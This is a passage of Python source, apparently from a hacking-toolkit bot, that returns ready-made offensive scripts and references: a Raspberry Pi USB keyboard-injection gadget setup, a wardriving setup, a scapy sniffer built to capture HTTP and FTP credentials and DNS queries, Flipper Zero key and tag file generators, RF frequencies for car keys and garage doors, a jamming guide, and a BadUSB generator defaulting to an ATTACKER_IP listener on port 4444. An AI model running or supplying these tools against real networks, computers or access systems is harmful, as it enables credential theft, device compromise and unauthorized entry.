 GND (25) (26) GP7     SPI CE1
 GP0 (27) (28) GP1     ID EEPROM
 GP5 (29) (30) GND
 GP6 (31) (32) GP12    PWM0
GP13 (33) (34) GND     PWM1
GP19 (35) (36) GP16
GP26 (37) (38) GP20
 GND (39) (40) GP21

Hacking Peripherals:
  PN532 NFC: SPI/I2C -> GPIO 10,9,11,8 or 2,3
  CC1101 Sub-GHz: SPI -> GPIO 10,9,11,8 + GPIO 25
  nRF24L01: SPI -> GPIO 10,9,11,8 + GPIO 17
  ESP8266/ESP32: UART -> GPIO 14,15
  HackRF/RTL-SDR: USB
  WiFi Adapter: USB (monitor mode)"""


def rpi_hid_attack_script():
    return """#!/bin/bash
# Raspberry Pi USB HID Attack (P4wnP1-style)
# Turns RPi Zero/Zero 2W into a USB attack platform

echo "=== P4wnP1 A.L.O.A. Setup ==="
echo "1. Download: https://github.com/RoganDawes/P4wnP1_aloa"
echo "2. Flash to SD card with Raspberry Pi Imager"
echo "3. Boot RPi Zero 2W with USB data cable"
echo "4. Connect to WiFi: P4wnP1 / MaMe82-P4wnP1"
echo "5. Web UI: http://172.24.0.1:8000"

echo "=== Manual USB Gadget ==="
# Enable USB gadget mode in /boot/config.txt:
# dtoverlay=dwc2
# In /boot/cmdline.txt add: modules-load=dwc2,libcomposite

cat > /usr/local/bin/usb_hid_setup.sh << 'GADGET'
#!/bin/bash
cd /sys/kernel/config/usb_gadget/
mkdir -p g1 && cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
mkdir -p strings/0x409
echo "PocketHacker" > strings/0x409/manufacturer
echo "USB Keyboard" > strings/0x409/product
mkdir -p functions/hid.usb0
echo 1 > functions/hid.usb0/protocol
echo 1 > functions/hid.usb0/subclass
echo 8 > functions/hid.usb0/report_length
echo -ne '\x05\x01\x09\x06\xa1\x01\x05\x07\x19\xe0\x29\xe7\x15\x00\x25\x01\x75\x01\x95\x08\x81\x02\x95\x01\x75\x08\x81\x03\x95\x05\x75\x01\x05\x08\x19\x01\x29\x05\x91\x02\x95\x01\x75\x03\x91\x03\x95\x06\x75\x08\x15\x00\x25\x65\x05\x07\x19\x00\x29\x65\x81\x00\xc0' > functions/hid.usb0/report_desc
mkdir -p configs/c.1/strings/0x409
echo "Config 1: HID" > configs/c.1/strings/0x409/configuration
ln -s functions/hid.usb0 configs/c.1/
ls /sys/class/udc > UDC
GADGET
chmod +x /usr/local/bin/usb_hid_setup.sh

echo "[*] Reboot to activate. Then run: sudo /usr/local/bin/usb_hid_setup.sh"
"""


def rpi_wardriving_setup():
    return """#!/bin/bash
# Raspberry Pi Wardriving Setup
# GPS + WiFi scanning for mapping wireless networks
sudo apt update
sudo apt install -y gpsd gpsd-clients kismet aircrack-ng python3-gps

# GPS Setup (USB GPS module):
sudo systemctl enable gpsd
sudo gpsd /dev/ttyUSB0 -F /var/run/gpsd.sock

# Kismet config:
cat > /etc/kismet/kismet_site.conf << 'KISMET'
source=wlan1:name=wardriving
gps=gpsd:host=localhost,port=2947
log_types=kismet,pcapng,wiglecsv
log_prefix=/home/pi/wardriving
KISMET

echo "[*] Start: sudo kismet"
echo "[*] Web UI: http://localhost:2501"
echo "[*] Upload results to WiGLE.net"
"""


def rpi_packet_sniffer():
    return """#!/usr/bin/env python3
# Network Packet Sniffer for Raspberry Pi
# Requires: scapy (pip3 install scapy)
from scapy.all import *
from collections import defaultdict
import sys

class PacketSniffer:
    def __init__(self, iface='wlan0'):
        self.iface = iface
        self.packets = []
        self.stats = defaultdict(int)
        self.credentials = []
        self.dns_queries = []

    def packet_handler(self, pkt):
        self.packets.append(pkt)
        if pkt.haslayer(TCP):
            self.stats['TCP'] += 1
            dport = pkt[TCP].dport
            if dport == 80:
                self.stats['HTTP'] += 1
                if pkt.haslayer(Raw):
                    payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                    if any(k in payload.lower() for k in ['user','pass','login','email','token']):
                        src = pkt[IP].src if pkt.haslayer(IP) else '?'
                        self.credentials.append(f'[HTTP] {src}: {payload[:200]}')
            elif dport == 443: self.stats['HTTPS'] += 1
            elif dport == 21:
                self.stats['FTP'] += 1
                if pkt.haslayer(Raw):
                    payload = pkt[Raw].load.decode('utf-8', errors='ignore')
                    if payload.startswith(('USER ','PASS ')):
                        self.credentials.append(f'[FTP] {pkt[IP].src}: {payload.strip()}')
        elif pkt.haslayer(UDP): self.stats['UDP'] += 1
        if pkt.haslayer(DNS) and pkt.haslayer(DNSQR):
            self.stats['DNS'] += 1
            self.dns_queries.append(pkt[DNSQR].qname.decode())
        if pkt.haslayer(ARP): self.stats['ARP'] += 1

    def start(self, count=0, timeout=None):
        print(f"[*] Sniffing on {self.iface}...")
        try:
            sniff(iface=self.iface, prn=self.packet_handler, count=count, timeout=timeout, store=0)
        except KeyboardInterrupt: pass
        self.print_summary()

    def print_summary(self):
        print(f"\nCapture Summary ({len(self.packets)} packets)")
        for proto, count in sorted(self.stats.items(), key=lambda x: -x[1]):
            print(f"  {proto}: {count}")
        if self.credentials:
            print(f"\nCaptured Credentials ({len(self.credentials)}):")
            for c in self.credentials: print(f"  {c}")
        if self.dns_queries:
            unique = list(dict.fromkeys(self.dns_queries))[:20]
            print(f"\nDNS Queries (top {len(unique)}):")
            for q in unique: print(f"  {q}")

if __name__ == '__main__':
    PacketSniffer(sys.argv[1] if len(sys.argv) > 1 else 'wlan0').start()
"""


# === iButton ===

IBUTTON_TYPES = {
    "cyfral": {"name": "Cyfral", "bits": 16, "desc": "Cyfral intercom keys. Common in Eastern Europe."},
    "dallas": {"name": "Dallas/DS1990A", "bits": 64, "desc": "1-Wire iButton. Most common type. 48-bit unique ID."},
    "metakom": {"name": "Metakom", "bits": 32, "desc": "Metakom intercom keys. Common in Russia/CIS."}
}


def generate_ibutton_file(uid, protocol="dallas"):
    uid_hex = uid.replace(":", " ").replace("-", " ").upper()
    proto_map = {"dallas": "DS1990", "cyfral": "Cyfral", "metakom": "Metakom"}
    proto_name = proto_map.get(protocol.lower(), "DS1990")
    return f"Filetype: Flipper iButton key\nVersion: 1\nProtocol: {proto_name}\nData: {uid_hex}\n"


def ibutton_info():
    lines = ["iButton Types:\n"]
    for key, t in IBUTTON_TYPES.items():
        lines.append(f"  * {key}: {t['name']} -- {t['desc']}")
    lines.append("\nUsage: /ibutton <uid> [protocol]")
    lines.append("Flipper: iButton > Read > hold iButton to reader")
    return "\n".join(lines)


# === Flipper Zero Firmware / Info ===

FLIPPER_FIRMWARES = {
    "official": {"name": "Official Flipper Firmware", "url": "https://github.com/flipperdevices/flipperzero-firmware", "desc": "Stock firmware. Stable but limited. No Sub-GHz region bypass."},
    "unleashed": {"name": "Unleashed Firmware", "url": "https://github.com/DarkFlippers/unleashed-firmware", "desc": "Most popular custom FW. Region bypass, extra protocols, rolling code."},
    "rogue_master": {"name": "RogueMaster Firmware", "url": "https://github.com/RogueMaster/flipperzero-firmware-wPlugins", "desc": "Feature-packed. Tons of plugins, apps, animations."},
    "xtreme": {"name": "Momentum/Xtreme Firmware", "url": "https://github.com/Next-Flip/Momentum-Firmware", "desc": "Clean UI, asset packs, powerful Sub-GHz, BLE spam built-in."}
}


def flipper_firmware_info():
    lines = ["Flipper Zero Firmware Options:\n"]
    for key, fw in FLIPPER_FIRMWARES.items():
        lines.append(f"  {fw['name']}")
        lines.append(f"    {fw['desc']}")
        lines.append(f"    {fw['url']}\n")
    lines.append("Recommended: Unleashed or Momentum for hacking")
    return "\n".join(lines)


def flipper_file_structure():
    return """Flipper Zero SD Card Structure:

/ext/
  apps/           Extra .fap applications
  apps_data/      App settings & data
  badusb/         BadUSB .txt scripts (DuckyScript)
  infrared/       IR .ir remote files
  lfrfid/         LF RFID .rfid files
  nfc/            NFC .nfc files + MIFARE key dicts
  subghz/         Sub-GHz .sub files + assets
  ibutton/        iButton .ibtn files
  music_player/   .fmf music files
  update/         Firmware updates
  dolphin/        Dolphin level/stats

Key file types:
  .sub  = Sub-GHz signals (record > replay)
  .nfc  = NFC card dumps (read > emulate > write)
  .rfid = LF RFID keys (read > emulate/write)
  .ir   = Infrared signals (learn > transmit)
  .ibtn = iButton keys (read > emulate/write)
  .txt  = BadUSB scripts (DuckyScript format)
  .fap  = Flipper applications (compiled plugins)"""


# === Common RF Frequencies ===

COMMON_FREQUENCIES = {
    "125": {"freq": "125 kHz", "use": "LF RFID (EM4100, HID Prox)"},
    "300": {"freq": "300.00 MHz", "use": "Garage doors (US old), some security systems"},
    "310": {"freq": "310.00 MHz", "use": "Linear/Firefly garage openers (US)"},
    "315": {"freq": "315.00 MHz", "use": "Car key fobs (US/Japan), garage doors, TPMS"},
    "390": {"freq": "390.00 MHz", "use": "Chamberlain/LiftMaster (US)"},
    "418": {"freq": "418.00 MHz", "use": "Security sensors, some car systems"},
    "433": {"freq": "433.92 MHz", "use": "Most common! Gates, remotes, weather stations, car keys (EU)"},
    "868": {"freq": "868.35 MHz", "use": "European frequency. Hormann, FAAC, smart home"},
    "915": {"freq": "915.00 MHz", "use": "US ISM band. LoRa, IoT devices, smart meters"},
    "1575": {"freq": "1575.42 MHz", "use": "GPS L1 frequency"},
    "2400": {"freq": "2.4 GHz", "use": "WiFi, Bluetooth, Zigbee, wireless keyboards, drones"},
    "5000": {"freq": "5 GHz", "use": "WiFi 5/6, modern routers"},
    "5800": {"freq": "5.8 GHz", "use": "FPV drones, video transmitters, radar detectors"}
}


def frequency_info(freq=None):
    if freq:
        freq_str = str(freq).replace(" ", "").lower().replace("mhz", "").replace("ghz", "000").replace("khz", "")
        freq_clean = freq_str.split(".")[0] if "." in freq_str else freq_str
        for key, info in COMMON_FREQUENCIES.items():
            if key == freq_clean or freq_str in info["freq"].lower():
                return f"{info['freq']}\nUse: {info['use']}"
        return f"Frequency {freq} not in database.\n\n" + frequency_info()
    lines = ["Common RF Frequencies:\n"]
    for key, info in COMMON_FREQUENCIES.items():
        lines.append(f"  {info['freq']:>12} -- {info['use']}")
    return "\n".join(lines)


def jamming_info():
    return """RF Jamming Reference (Educational Only)

WARNING: Jamming is ILLEGAL in most countries.

How it works:
  Transmit noise on target frequency to overwhelm legitimate signals.

Common targets:
  WiFi: 2.4/5 GHz (deauth frames = legal gray area)
  Cellular: 700-2700 MHz (VERY illegal, blocks 911)
  Car keys: 315/433 MHz (used in relay attacks)
  GPS: 1575.42 MHz (illegal, affects aviation)
  Drones: 2.4/5.8 GHz (forces return-to-home)

Flipper Zero can:
  Detect and analyze RF signals
  Record and replay signals
  CANNOT jam (too low power)

Testing tools (with authorization):
  HackRF One: 1MHz-6GHz, $350
  YARD Stick One: Sub-GHz, $100
  ESP32 Marauder: WiFi deauth only, $15

Legal alternatives:
  Faraday bags/cages for signal blocking
  WiFi deauth for YOUR OWN network testing"""


# === Universal File Generator ===

def flipper_generate(file_type, **kwargs):
    generators = {
        "sub": lambda: generate_sub_file(kwargs.get("protocol", "princeton"), kwargs.get("frequency"), kwargs.get("bits"), kwargs.get("code", "0"), kwargs.get("te")),
        "nfc": lambda: generate_nfc_file(kwargs.get("uid", "04 01 02 03 04 05 06"), kwargs.get("protocol", "mifare_classic_1k")),
        "rfid": lambda: generate_rfid_file(kwargs.get("uid", "01 02 03 04 05"), kwargs.get("protocol", "em4100")),
        "ir": lambda: generate_ir_file(kwargs.get("device", "tv")),
        "ibtn": lambda: generate_ibutton_file(kwargs.get("uid", "01 02 03 04 05 06 07 08"), kwargs.get("protocol", "dallas")),
        "badusb": lambda: generate_duckyscript(kwargs.get("template", "rickroll"), lhost=kwargs.get("lhost", "ATTACKER_IP"), lport=kwargs.get("lport", "4444")),
    }
    if file_type not in generators:
        return f"Unknown file type: {file_type}\nSupported: {', '.join(generators.keys())}"
    return generators[file_type]()
